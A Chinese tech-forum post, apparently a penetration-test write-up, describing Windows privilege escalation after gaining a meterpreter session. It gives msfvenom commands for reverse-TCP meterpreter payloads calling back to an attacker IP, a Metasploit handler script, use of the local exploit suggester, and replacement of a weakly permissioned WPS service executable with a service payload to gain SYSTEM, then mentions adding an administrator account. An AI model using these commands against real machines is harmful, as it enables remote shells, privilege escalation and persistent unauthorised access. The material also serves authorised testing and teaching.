电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 757 人浏览分享

记一次简单的win提权

[复制链接]
757 0
1、前言

在一次测试中,通过rce漏洞获得了目标主机meterpreter会话 尝试进行一些提权实验。

过程中两台机子都不通外网 本文记录一下获得会话并提权过程。

2、获取msf会话

生成一个exe载荷,看情况免杀:
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.12
  2. 2.135 LPORT=443 -f exe -o 666.exe
复制代码

在准备让目标机执行我们的载荷前 先使用脚本(通过msfpc来生成)来快速监听会话
并进行一些自动进程迁移的工作:
  1. msfconsole -q -r '/home/yanghao/windows-meterpreter-stag
  2. ed-reverse-tcp-443-exe.rc'
复制代码

脚本内容如下:
  1. use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.
  2. 168.122.135set LPORT 443set ExitOnSession falseset EnableStageEncoding trueset Enabl
  3. eUnicodeEncoding trueset AutoRunScript 'post/windows/manage/migrate' run -j
复制代码

参数的具体含义可以在设置了payload后执行show advanced查看:

QQ截图20211119160431.png

开始监听:

512.png

目标机上执行生成的exe,获取会话:

200.png

3、尝试提权

看了下目标已经是管理员权限了 如果要抓密码的话 得拿到system 准备试试 先ps看一下进
程发现有杀软。不过没关系 没有外网战力-50%:

199.png

假装getsystem一下,whoami /priv 查看一下权限:

198.png

localexploitsuggester 模块失败

试试自带的模块来检查提取漏洞:
  1. use post/multi/recon/local_exploit_suggester
复制代码

196.png

发现有了一些漏洞,然后就加载对应的利用模块来进行尝试:

193.png

192.png

191.png

柳暗花明 (enum_services利用)
差不多模块都试了一下 因为有杀软的原因,都失败了。这时候想着找点新的exp来用用 但是网络
不太方便就先看看主机上的情况。先看了下主机上启动的服务情况:
  1. use post/windows/gather/enum_services
复制代码

190.png

发现了一个在D盘的服务(wpscloudsvr LocalSystem "D:\Program Files\WPS Offi
ce\wpscloudsvr.exe" LocalService):

189.png

这里我们知道 在C盘Windows,Program Files等目录下的文件都会被系统权限保护 而这个wpscloudsvr
服务的可执行文件放在了D盘 (这也是个很正常的事,总不能啥软件都往C盘装吧)如果软件开放过程中未
对这种类似服务的文件进行权限限制同时可以对服务进行重启动,那么就可以利用替换该服务文件的方
法来获得权限提升。接下来通过
  1. cacls wpscloudsvr.exe
复制代码

查看文件权限 发现权限设置不当,标准用户可以对其更改  图找不到了 大概结果就像下面这样
同时也可以直接使用net命令对服务进行启动和停止:

188.png

现在条件都满足了,生成个马给这个文件替换了 重新启动服务不就完成提权了吗?
快速操作中...1、使用msfvenom生成一个exe-service类型的载荷:
  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.135 LPO
  2. RT=8522 -f exe-service -o wpscloudsvr.exe
复制代码

186.png

2、上传并启动服务,并获得了会话:
  1. uplaod /xx/xx/wpscloudsvr.exe "D:\\Program Files\\WPS Office\\wpscloudsvr.exe"
  2. shell>net start wpscloudsvr
复制代码

182.png

这里就拿到了system权限的会话了:

181.png

180.png

后面就是上远程桌面看看 加个管理员账户什么的:

19.png

4、总结

1、使用metasploit脚本进行自动化设置

2、metasploit本地提权漏洞扫描 利用 相关信息收集模块使用;

3、服务可执行文件权限设置不当的cacls检查 exe-service载荷生成 替换执行提权。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.